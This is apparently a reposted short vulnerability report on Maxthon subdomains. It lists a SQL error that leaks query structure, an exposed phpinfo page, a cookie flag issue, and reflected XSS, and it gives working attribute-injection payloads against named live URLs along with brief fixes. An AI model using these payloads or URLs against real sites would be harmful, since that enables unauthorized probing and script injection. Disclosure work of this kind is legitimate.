1.SQL error Leak (table,column) 2.phpinfo 3.Apache httpOnly Cookie 4.XSS 1.SQL error Leak (table,column) http://help.maxthon.cn//view.php?cid=214&tid=9 Query Error: SELECT * FROM help_contentindex i LEFT JOIN help_content c USING(tid) WHERE i.tid='9' AND cid='214'
2.phpinfo http://help.maxthon.cn//test.php
3.Apache httpOnly Cookie Vuln help.maxthon.cn
4.XSS
http://tuan.maxthon.cn:80//dianping/index.php?request=site&sid=547&type=" onmouseover=alert(/insight/) bad="
http://tuan.maxthon.cn//Search/?Page=5&Value=" onmouseover=alert(/insight/) bad=" 1.SQL error Leak (table,column)
2.phpinfo
3.Apache httpOnly Cookie HdhCmsTest2cto测试数据
4.XSS
修复方案: 1.don't print error message 2.remove file 3.upgrade web server 4.Filter Iuput 作者 insight-labs
查看更多关于傲游分站多重缺陷 - 网站安全 - 自学php的详细内容...